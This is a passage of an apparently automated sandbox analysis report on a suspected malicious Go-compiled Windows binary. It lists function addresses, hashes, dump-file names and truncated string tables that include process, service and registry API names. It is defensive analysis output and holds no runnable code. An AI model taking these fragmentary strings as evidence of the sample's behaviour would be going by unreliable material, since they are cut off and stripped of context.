                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (bad use of unsafe.Pointer? try -d=checkptr)PE image does not contains a COFF symbol tablebytes.Reader.UnreadByte: at beginning of sliceedwards25519: invalid field element input sizefirst path segment in URL cannot contain coloninvalid e_lfanew value. Probab$ alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHe$ freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b$ marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneifor$ zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarM$, elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateFileWDelayImportDeleteFileWDives_AkuruExitProcessFieldLayoutFreeLib$.$found pointer to free objectgcBgMarkWorker: mode not setgcstopm: negative nmspinninginvalid P224Element encodinginvalid P384Element encodinginvalid P521Element encodinginvalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sw$runtime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaFixed64 called with prec > 18strings.Builder.Grow: negative countsyntax e
                                                                                • API String ID: 0-760742341
                                                                                • Opcode ID: 59537ceeee8166b05eadd2d89912bdc1744dba01f320f3e82e1022617d566629
                                                                                • Instruction ID: 8297cd8557e287588c782f69e9e96a249a2b68c376537dcb12e6a66d1dadd424
                                                                                • Opcode Fuzzy Hash: 59537ceeee8166b05eadd2d89912bdc1744dba01f320f3e82e1022617d566629
                                                                                • Instruction Fuzzy Hash: 7871F4748097818AC340EF75D29172EBBE0AF99708F84895EE8D98B382D774D944DB63
                                                                                Function 00B063C0 Relevance: 11.4, Strings: 9, Instructions: 156COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNSTNULNa, xrefs: 00B06620
                                                                                • types value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ st, xrefs: 00B06538
                                                                                • not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00B064E9
                                                                                • out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitializeExCoUninitializeControlS, xrefs: 00B065F6
                                                                                • runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x, xrefs: 00B065A8
                                                                                • runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version, xrefs: 00B06494, 00B065CB
                                                                                • !, xrefs: 00B0665D
                                                                                • base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHy, xrefs: 00B064BF
                                                                                • runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangescalar has high bit set illegallyslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingstruct contains unexported fi, xrefs: 00B06654
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: types value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ st$ - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNSTNULNa$ base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHy$ not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory$ out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitializeExCoUninitializeControlS$!$runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x$runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangescalar has high bit set illegallyslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingstruct contains unexported fi$runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version
                                                                                • API String ID: 0-4105162765
                                                                                • Opcode ID: e4de1a3e6fbf3a33fb445f0fab891ce84f5fe4a60ea7bb7fe35ca1b035064efe
                                                                                • Instruction ID: bacec398948c73afd6405331afba7471988639bca544d31935d398e268090fbd
                                                                                • Opcode Fuzzy Hash: e4de1a3e6fbf3a33fb445f0fab891ce84f5fe4a60ea7bb7fe35ca1b035064efe
                                                                                • Instruction Fuzzy Hash: 4761F2B4909B459FC304EF75D19576EBBE0BF88708F80896DE88887392E774D9488B52
                                                                                Function 00AD1170 Relevance: 11.4, Strings: 9, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • MB; allocated MakeAbsoluteSDModule32FirstWNetUserGetInfoNtResumeThreadOS/2 characterOaBuildVersionOleLoadPictureOpenSCManagerWOther_ID_StartPattern_SyntaxProcess32NextWQuotation_MarkRCodeNameErrorRegSetValueExWSafeArrayRedimSetConsoleModeSetFilePointerSetThrea, xrefs: 00AD1291
                                                                                • X*, xrefs: 00AD1209
                                                                                • pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMu, xrefs: 00AD1328
                                                                                • pacer: sweep done at heap size pattern contains path separatorpkcs7: unsupported algorithm %q : negative cap : negative len : Len of non-array type : NumIn of non-func typeresetspinning: not a spinning mruntime: can, xrefs: 00AD125A
                                                                                • sweeper left outstanding across sweep generationsx509: Ed25519 key encoded with illegal parametersx509: invalid RDNSequence: invalid attribute typeExport directory contains zero number of functionsGlobal pointer register offset outside of PE imageMust have eit, xrefs: 00AD1361
                                                                                • 1, xrefs: 00AD136A
                                                                                • mismatched begin/end of activeSweepnetwork dropped connection on resetno such multicast network interfacenot a PE file, smaller than tiny PEpersistentalloc: align is too largepidleput: P has non-empty run queue of non-slice typeruntime: close , xrefs: 00AD134B
                                                                                • MB during sweep; swept Marquesas Standard TimeMauritius Standard TimeNoncharacter_Code_PointNtSetInformationProcessP224 point not on curveP384 point not on curveP521 point not on curveQueryServiceLockStatusWQyzylorda Standard TimeRegNotifyChangeKeyValueRtlGetN, xrefs: 00AD12D8
                                                                                • pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoEx, xrefs: 00AD1302
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoEx$ pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMu$1$MB during sweep; swept Marquesas Standard TimeMauritius Standard TimeNoncharacter_Code_PointNtSetInformationProcessP224 point not on curveP384 point not on curveP521 point not on curveQueryServiceLockStatusWQyzylorda Standard TimeRegNotifyChangeKeyValueRtlGetN$MB; allocated MakeAbsoluteSDModule32FirstWNetUserGetInfoNtResumeThreadOS/2 characterOaBuildVersionOleLoadPictureOpenSCManagerWOther_ID_StartPattern_SyntaxProcess32NextWQuotation_MarkRCodeNameErrorRegSetValueExWSafeArrayRedimSetConsoleModeSetFilePointerSetThrea$X*$mismatched begin/end of activeSweepnetwork dropped connection on resetno such multicast network interfacenot a PE file, smaller than tiny PEpersistentalloc: align is too largepidleput: P has non-empty run queue of non-slice typeruntime: close $pacer: sweep done at heap size pattern contains path separatorpkcs7: unsupported algorithm %q : negative cap : negative len : Len of non-array type : NumIn of non-func typeresetspinning: not a spinning mruntime: can$sweeper left outstanding across sweep generationsx509: Ed25519 key encoded with illegal parametersx509: invalid RDNSequence: invalid attribute typeExport directory contains zero number of functionsGlobal pointer register offset outside of PE imageMust have eit
                                                                                • API String ID: 0-842453239
                                                                                • Opcode ID: a266e13b845ff1945393f0adefcc246a38963899035d6b0c41cf76a08811079c
                                                                                • Instruction ID: 63179950391efd1b5dade2a49644ae77fe2939e8a563513edf40bbc8cde88c6d
                                                                                • Opcode Fuzzy Hash: a266e13b845ff1945393f0adefcc246a38963899035d6b0c41cf76a08811079c
                                                                                • Instruction Fuzzy Hash: 115126B46087458FC304EF29D19462EBBF0FB89348F808A2EF89997351E734D985CB52
                                                                                Function 00ACA680 Relevance: 10.4, Strings: 8, Instructions: 447COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • , xrefs: 00ACAD77
                                                                                • mark - bad statusmarkBits overflownil resource bodyno data availablenotetsleepg on g0permission denied : New(nil) : call of runtime/internal/runtime: level = runtime: nameOff runtime: pointer runti, xrefs: 00ACA958
                                                                                • runtime:scanstack: gp=s.freeindex > s.nelemsscanstack - bad statussend on closed channelspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p statex509: malformed is, xrefs: 00ACADB5
                                                                                • , goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicMarchenMultaniM, xrefs: 00ACA8FA, 00ACAD10, 00ACADDA
                                                                                • can't scan our own stackconnection reset by peerdouble traceGCSweepStartflate: maxBits too largefloating point exceptionfunction not implementedgcDrainN phase incorrecthash of unhashable type initSpan: unaligned baseinvalid argument to Intnlevel 2 not synchron, xrefs: 00ACAC9B
                                                                                • runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host nam, xrefs: 00ACA8D5, 00ACACEB
                                                                                • scanstack: goroutine not stoppedslice bounds out of range [%x::]slice bounds out of range [:%x:]slice bounds out of range [::%x]software caused connection abortsweep increased allocation counttransform: short internal bufferuse of closed network connectionx509, xrefs: 00ACAD6E
                                                                                • , gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextDllUnregisterServerEgypt Standard TimeGC work not f, xrefs: 00ACA924, 00ACAD3A, 00ACAE04
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicMarchenMultaniM$, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextDllUnregisterServerEgypt Standard TimeGC work not f$can't scan our own stackconnection reset by peerdouble traceGCSweepStartflate: maxBits too largefloating point exceptionfunction not implementedgcDrainN phase incorrecthash of unhashable type initSpan: unaligned baseinvalid argument to Intnlevel 2 not synchron$mark - bad statusmarkBits overflownil resource bodyno data availablenotetsleepg on g0permission denied : New(nil) : call of runtime/internal/runtime: level = runtime: nameOff runtime: pointer runti$runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host nam$runtime:scanstack: gp=s.freeindex > s.nelemsscanstack - bad statussend on closed channelspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p statex509: malformed is$scanstack: goroutine not stoppedslice bounds out of range [%x::]slice bounds out of range [:%x:]slice bounds out of range [::%x]software caused connection abortsweep increased allocation counttransform: short internal bufferuse of closed network connectionx509
                                                                                • API String ID: 0-3675785163
                                                                                • Opcode ID: bdab50c62cfe7612111f4f29217d7001c6e03630d91395c92783b67f612c84e8
                                                                                • Instruction ID: 3c6016fcb2fa342a1f58b0291a61718627eb441dd91a0726fe7c240d98256cbc
                                                                                • Opcode Fuzzy Hash: bdab50c62cfe7612111f4f29217d7001c6e03630d91395c92783b67f612c84e8
                                                                                • Instruction Fuzzy Hash: D822D274508788CFC764EF65D694BAABBF0BF88308F01892DE4898B351E774D948DB42
                                                                                Function 00AF00F0 Relevance: 10.2, Strings: 8, Instructions: 206COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • no goroutines (main called runtime.Goexit) - deadlock!runtime: signal received on thread not created by Go.x509: cannot verify signature: algorithm unimplementedx509: invalid RDNSequence: invalid attribute value: %s is currently not supported for use in syste, xrefs: 00AF031B
                                                                                • mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEven, xrefs: 00AF039C
                                                                                • checkdead: no m for timerexplicit tag has no childinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfaceinvalid object identifiermissing stack in newstackmissing traceGCSweepStartnet/url: invalid userinfono buffer space availableno such de, xrefs: 00AF02F6
                                                                                • checkdead: inconsistent counts : invalid public key : verification errorfailed to get system page sizefreedefer with d._panic != nilinappropriate ioctl for deviceinvalid PE file signature: % xinvalid network interface nameinvalid pointer foun, xrefs: 00AF03FC
                                                                                • nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaM, xrefs: 00AF03C7
                                                                                • 6, xrefs: 00AF0324
                                                                                • nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitia, xrefs: 00AF0371
                                                                                • all goroutines are asleep - deadlock!cannot exec a shared library directlycipher: message authentication failed : incorrect GCM tag size : invalid buffer overlap : public exponent too large : public exponent too small , xrefs: 00AF0295
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEven$ nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitia$ nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaM$6$all goroutines are asleep - deadlock!cannot exec a shared library directlycipher: message authentication failed : incorrect GCM tag size : invalid buffer overlap : public exponent too large : public exponent too small $checkdead: inconsistent counts : invalid public key : verification errorfailed to get system page sizefreedefer with d._panic != nilinappropriate ioctl for deviceinvalid PE file signature: % xinvalid network interface nameinvalid pointer foun$checkdead: no m for timerexplicit tag has no childinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfaceinvalid object identifiermissing stack in newstackmissing traceGCSweepStartnet/url: invalid userinfono buffer space availableno such de$no 